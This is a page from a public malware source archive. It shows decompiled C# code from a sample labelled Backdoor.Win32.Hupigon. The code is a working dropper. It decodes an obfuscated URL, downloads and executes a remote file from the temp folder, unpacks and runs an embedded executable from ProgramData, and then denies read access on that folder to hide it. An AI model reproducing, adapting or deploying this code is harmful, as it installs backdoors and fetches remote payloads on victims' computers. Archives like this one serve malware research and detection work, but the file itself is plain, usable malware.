mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-21 18:29:26 +00:00
vxunderground
170 lines
5.2 KiB
C#
170 lines
5.2 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: X
|
|
// Assembly: 12, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 02FFA771-B60F-49F4-BE51-37E50E40AF6A
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.Hupigon.mrzd-97a335ad9a7d65429e8d9aedeaa1dd6b93990dd399d43ca43d8ef174c0f0faee.exe
|
|
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using My;
|
|
using System;
|
|
using System.Collections;
|
|
using System.IO;
|
|
using System.IO.Compression;
|
|
using System.Net;
|
|
using System.Reflection;
|
|
using System.Resources;
|
|
using System.Security.AccessControl;
|
|
using System.Security.Principal;
|
|
using System.Text;
|
|
|
|
internal class X
|
|
{
|
|
[STAThread]
|
|
public static void main()
|
|
{
|
|
if (AppDomain.CurrentDomain.BaseDirectory.Length < 4 | Strings.InStr(AppDomain.CurrentDomain.BaseDirectory.ToLower(), "temp") > 0)
|
|
{
|
|
try
|
|
{
|
|
WebClient webClient1 = new WebClient();
|
|
string path = Interaction.Environ("temp") + "\\jp.exe";
|
|
WebClient webClient2 = webClient1;
|
|
string s = "Ahr0CdOVl2XVywrPBMCTys5SzwfKAg9ZDgvYlMnVBs90ywWUmJaXmdKYoteXmJe1nc5LEgu=";
|
|
string address = X.DEB(ref s);
|
|
byte[] bytes = webClient2.DownloadData(address);
|
|
System.IO.File.WriteAllBytes(path, bytes);
|
|
Interaction.Shell(Interaction.Environ("temp") + "\\jp.exe");
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
}
|
|
byte[] bytes1 = X.Z(X.Z((byte[]) new ResourceManager("M", Assembly.GetExecutingAssembly()).GetObject("A")));
|
|
string Path = Interaction.Environ("programdata") + "\\DCSCRES_SERVERW";
|
|
string str = Path + "\\DCSCRES_SERVERW.exe";
|
|
try
|
|
{
|
|
FileSystem.MkDir(Path);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
try
|
|
{
|
|
X.BD(ref Path);
|
|
System.IO.File.WriteAllBytes(str, bytes1);
|
|
Interaction.Shell(str);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
}
|
|
|
|
public static byte[] Z(byte[] Byt)
|
|
{
|
|
MemoryStream memoryStream = new MemoryStream(Byt);
|
|
GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress);
|
|
byte[] buffer = new byte[4];
|
|
memoryStream.Position = checked (memoryStream.Length - 5L);
|
|
memoryStream.Read(buffer, 0, 4);
|
|
int int32 = BitConverter.ToInt32(buffer, 0);
|
|
memoryStream.Position = 0L;
|
|
byte[] array = new byte[checked (int32 - 1 + 1)];
|
|
gzipStream.Read(array, 0, int32);
|
|
gzipStream.Dispose();
|
|
memoryStream.Dispose();
|
|
return array;
|
|
}
|
|
|
|
public static string DEB(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(X.Lu(ref s)));
|
|
|
|
public static string Lu(ref string text)
|
|
{
|
|
string str1 = "qwertyuiopasdfghjklzxcvbnm";
|
|
string str2 = "";
|
|
int num1 = checked (text.Length - 1);
|
|
int index1 = 0;
|
|
if ((MyApplication.\u002E\u002E\u002E\u002E & 1030) == 0)
|
|
goto label_10;
|
|
label_1:
|
|
int num2 = checked (str1.Length - 1);
|
|
int index2 = 0;
|
|
if ((MyApplication.\u002E\u002E\u002E\u002E & 22) == 0)
|
|
goto label_7;
|
|
label_2:
|
|
char ch1 = text[index1];
|
|
char ch2;
|
|
if ((int) ch1 == (int) str1[index2])
|
|
{
|
|
string str3 = str2;
|
|
ch2 = text[index1];
|
|
string upper = ch2.ToString().ToUpper();
|
|
str2 = str3 + upper;
|
|
if ((MyApplication.\u002E\u002E\u002E\u002E & 5700) == 0)
|
|
goto label_9;
|
|
}
|
|
int num3 = (int) ch1;
|
|
ch2 = str1[index2];
|
|
int num4 = (int) Conversions.ToChar(ch2.ToString().ToUpper());
|
|
if (num3 == num4)
|
|
{
|
|
str2 += text[index1].ToString().ToLower();
|
|
if ((MyApplication.\u002E\u002E\u002E\u002E & 1538) == 0)
|
|
goto label_9;
|
|
}
|
|
checked { ++index2; }
|
|
label_7:
|
|
if (index2 > num2)
|
|
str2 += Conversions.ToString(text[index1]);
|
|
else
|
|
goto label_2;
|
|
label_9:
|
|
checked { ++index1; }
|
|
label_10:
|
|
if (index1 > num1)
|
|
return str2;
|
|
goto label_1;
|
|
}
|
|
|
|
public static void BD(ref string Path)
|
|
{
|
|
DirectorySecurity accessControl1 = Directory.GetAccessControl(Path, AccessControlSections.All);
|
|
IEnumerator enumerator;
|
|
try
|
|
{
|
|
enumerator = accessControl1.GetAccessRules(true, true, typeof (NTAccount)).GetEnumerator();
|
|
if ((MyApplication.\u002E\u002E\u002E\u002E & 4624) == 0)
|
|
goto label_5;
|
|
label_2:
|
|
FileSystemAccessRule current = (FileSystemAccessRule) enumerator.Current;
|
|
try
|
|
{
|
|
DirectorySecurity accessControl2 = Directory.GetAccessControl(Path, AccessControlSections.All);
|
|
FileSystemAccessRule rule = new FileSystemAccessRule((IdentityReference) new NTAccount(Strings.Split(current.IdentityReference.Value, "\\")[1]), FileSystemRights.ReadData, AccessControlType.Deny);
|
|
accessControl2.AddAccessRule(rule);
|
|
Directory.SetAccessControl(Path, accessControl2);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
label_5:
|
|
if (enumerator.MoveNext())
|
|
goto label_2;
|
|
}
|
|
finally
|
|
{
|
|
if (enumerator is IDisposable)
|
|
(enumerator as IDisposable).Dispose();
|
|
}
|
|
}
|
|
}
|